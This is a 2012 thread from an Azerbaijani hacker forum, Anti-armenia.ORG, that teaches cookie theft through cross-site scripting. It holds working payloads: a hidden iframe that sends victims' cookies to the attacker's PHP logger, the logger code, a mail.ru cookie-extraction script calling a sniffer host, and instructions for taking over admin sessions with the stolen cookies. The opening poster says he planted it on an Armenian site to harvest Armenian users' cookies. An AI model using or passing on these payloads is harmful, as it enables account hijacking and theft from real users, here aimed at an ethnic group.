Anti-armenia.ORG - Forumlar - XSS Cookie and ip stealer [Sniffer PHP]



Istifadəçi
    2012-07-06 19:22 GMT                 

Worm Man



Gold
Mesaj Sayı : 159
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baku
Ölkə :
Məslək : Sərbəst
Yaş : 27
Mesaj :

Mövzunu Paylaş!


ƏvvƏlcədən deyim hostunuz olmalıdır php. 000webhost.com en yaxşısıdır
Xss-li yerə bunu yazacaqsınız
Kod:
"><iframe src="javascript:window.location=%22http://hostunuz/cookie.php?cookie=%22 + document.cookie" height="1" width="1" frameborder="0"></iframe>

orda cookie.php yerine php faylın adını yazacaqsınız.Indi isı php kod
Kod:
<?php
$cookie =$_GET['cookie'];
$date = date ("l ds of F Y h:i:s A");
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('log.html', 'a');
fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie <br />");
fclose($file);
?>

Bunu istədiyiniz adda adlandırın.Təki xss kodu üçün uyğun olsun Mən cookie.php adlandırmışdım kodlar log.html-ə yazılacaq
Nə isə bu kodun üstünlüyü ondadır ki tələyə salınmış user tələyə salındığını bilmir əgər xss kodunu <script> ilə etseydim browser-də bilinəcəkdi amma burda hər şey iframe-in içində gedir o da gizlədilib
P.S.:Bu kodu construction.am-a atmişam ermeni cookiləri gelecek 100% işləyir mənə aiddir

Live to die another day
Anti-armenia.ORG
    

Istifadəçi
    2012-07-06 19:35 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


əla
iframe-in əvəzinə img də etmək olar


mail.ru üçün isə bele etmek olar əgər xss varsa onda öz saytıvızda bele bir javascript düzəldirsiz

Kod:
var the_cookie = document.cookie;
var the_cookie = unescape(the_cookie);
var broken_cookie = the_cookie.split("Mpop");
var the_value = broken_cookie["1"];
document.getElementById('TipOfTheDay').innerHTML='<IfRaMe width=0 height=1 src="http://sniffer.com/img.php?'+the_value+'"></IfRaMe>';document.getElementById('TipOfTheDay').style.display='none';


və xss-nen bu scripti serverde run edirsiz

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2012-07-12 20:47 GMT                 

biahell



İstifadəçi
Mesaj Sayı : 47
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : baku
Ölkə :
Məslək : haberci
Yaş : 36
Mesaj :

Mövzunu Paylaş!


əgər mümkündürsə video olaraq çəkə bilərsiz?

Mən bilirəm ki, mən heçnə bilmirəm
Anti-armenia.ORG
    

Istifadəçi
    2012-07-12 20:54 GMT                 

Sh00cK!nG



VIP
Mesaj Sayı : 78
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : sh00ck!nG
Yaş :
Mesaj :

Mövzunu Paylaş!


İndi bunu adminə yedirtməliyik ki Cookie-si gəlsin hə??

Warning: mysql_vb_spy(): supplied argument is not a valid MySQL result resource in /home/cloudflare/cloud/public_html/showthread.php on line 191
Anti-armenia.ORG
    

Istifadəçi
    2012-07-13 08:49 GMT                 

Worm Man



Gold
Mesaj Sayı : 159
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baku
Ölkə :
Məslək : Sərbəst
Yaş : 27
Mesaj :

Mövzunu Paylaş!


hə cookie gələndə mozilla addonları ilə öz cookieni onun cookie-siylə dəyişib olursan admin ya da elə saytlar var ki cookie də admin parolu gösrərir

Live to die another day
Anti-armenia.ORG
    

Istifadəçi
    2012-10-20 18:50 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


burda logş.html özü avomatik yaranacaq ya özümüz yaratmalıyıq?

Anti-armenia.ORG
    

Istifadəçi
    2012-10-20 23:25 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Sitat
#12981 TheConficker :
burda logş.html özü avomatik yaranacaq ya özümüz yaratmalıyıq?



özü yaranmayacaq özümüz yaratmalıyıq ondan əlavə bu log.html -in formatı log.txt-də ola bilər. Uğurlar

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 03:17 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Fayl log.html özü yaranacaq orada fopen-də a moddadır.
a modda da fayl mövcüd deyilsə onu yaratmağa cəhd edir.
+
Bu skriptdəki $cookie sanitizə edilməyib deyə özü avtomatik log.html-də XSS yaradacaq.


logger.php?cookie="><script>location.replace("http://artiq_attackeri_owned_edirik.tld");</script>

yəniki attacker loglara baxanda onu başqa səhifəyə yönləndirib "tutmaq" olar.


Fixed versiya:

Kod:
<?php
error_reporting(0);
$cookie =htmlspecialchars($_GET['cookie']);
$date = date ("l ds of F Y h:i:s A");
$ip = htmlspecialchars($_SERVER['REMOTE_ADDR']);
$file = fopen('log.html', 'a');
fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie <br />");
fclose($file);
?>

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 06:12 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


bunu mən localhostda qurdum ip-i adresimlə nəsə alınmır bilirsiniz niyə deyirəm ip-imə kim girir onun log-un və cookiesin tutum

Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 18:18 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Sitat
#12996 BlackMinD :
Fayl log.html özü yaranacaq orada fopen-də a moddadır.
a modda da fayl mövcüd deyilsə onu yaratmağa cəhd edir.
+
Bu skriptdəki $cookie sanitizə edilməyib deyə özü avtomatik log.html-də XSS yaradacaq.


logger.php?cookie="><script>location.replace("http://artiq_attackeri_owned_edirik.tld");</script>

yəniki attacker loglara baxanda onu başqa səhifəyə yönləndirib "tutmaq" olar.


Fixed versiya:

Kod:
<?php
error_reporting(0);
$cookie =htmlspecialchars($_GET['cookie']);
$date = date ("l ds of F Y h:i:s A");
$ip = htmlspecialchars($_SERVER['REMOTE_ADDR']);
$file = fopen('log.html', 'a');
fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie <br />");
fclose($file);
?>



Bro Təşəkkürlər a modda olanda automatic yaradır. Mən özüm yaradırdım həmişə. Məkumata görə Təşəkkürlər

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 19:17 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@Avatar Dəyməz sən də sağol.

@TheConficker yəniki İP modemin öz interfeysi üçün yoxsa port 80-da vertrigo üçün?

Modem üçündürsə inanmıramki reallaşsın.
Amma vertrigo üçün o halda həm Apachenin loglarına düşəcək ziyarətçinin İP-Sİ timestampı + Brauzeri+Query stringi (yəni hansisafayl.php?parameter=VALUE) şəklində ($_GET request üçün)
Ammaki Apache-də onu hər hansı php scriptə include edib tutmaq olar sadə şeydir.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-10-22 12:00 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#13064 BlackMinD :
@Avatar Dəyməz sən də sağol.

@TheConficker yəniki İP modemin öz interfeysi üçün yoxsa port 80-da vertrigo üçün?

Modem üçündürsə inanmıramki reallaşsın.
Amma vertrigo üçün o halda həm Apachenin loglarına düşəcək ziyarətçinin İP-Sİ timestampı + Brauzeri+Query stringi (yəni hansisafayl.php?parameter=VALUE) şəklində ($_GET request üçün)
Ammaki Apache-də onu hər hansı php scriptə include edib tutmaq olar sadə şeydir.



aha vetigro üçün amma biri var ip dushur isteyirem cookieleri de dushsun ipini tutmaq olur esas qalib cookie
fikrimi düz başa düşdün

Anti-armenia.ORG
    

Istifadəçi
    2012-10-23 20:36 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@TheConficker yox bro cookieni XSS-siz (2-ci saytın cookiesini)oxumaq mümkün deyil.
Yəni kimsə sənin deyək localhostuna adi qaydada:

http://xx.xxx.xxx.xxx/hansisafayl.php

kimi girirsə burda sözsüz ki, sən o ziyarətçinin cookiesini (başqa domen) üçün oxuya bilməzsən.(Yalnız öz domenin üçün oxuya bilərsən)
Same Origin Policy (brauzerlərdə realizə edilən bir şeydir) buna imkan vermir.
Yox əgər artıq XSS şəklində məsəl üçün:



http://hedefsayt.tld/page.php?num=XSS PAYLOAD_HANSIKI_YÖNLƏNİR_http://xx.xxx.xxx.xxx/hansisafayl.php + COOKİE

bu halda isə doğrudur o.
Belədə amma İP-ni tutmaq asandır.Same Origin Policylik bir şey yoxdur çünki.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-10-23 21:02 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#13154 BlackMinD :
@TheConficker yox bro cookieni XSS-siz (2-ci saytın cookiesini)oxumaq mümkün deyil.
Yəni kimsə sənin deyək localhostuna adi qaydada:

http://xx.xxx.xxx.xxx/hansisafayl.php

kimi girirsə burda sözsüz ki, sən o ziyarətçinin cookiesini (başqa domen) üçün oxuya bilməzsən.(Yalnız öz domenin üçün oxuya bilərsən)
Same Origin Policy (brauzerlərdə realizə edilən bir şeydir) buna imkan vermir.
Yox əgər artıq XSS şəklində məsəl üçün:



http://hedefsayt.tld/page.php?num=XSS PAYLOAD_HANSIKI_YÖNLƏNİR_http://xx.xxx.xxx.xxx/hansisafayl.php + COOKİE

bu halda isə doğrudur o.
Belədə amma İP-ni tutmaq asandır.Same Origin Policylik bir şey yoxdur çünki.



ətraflı məlumata görə təşəkkürlər

Anti-armenia.ORG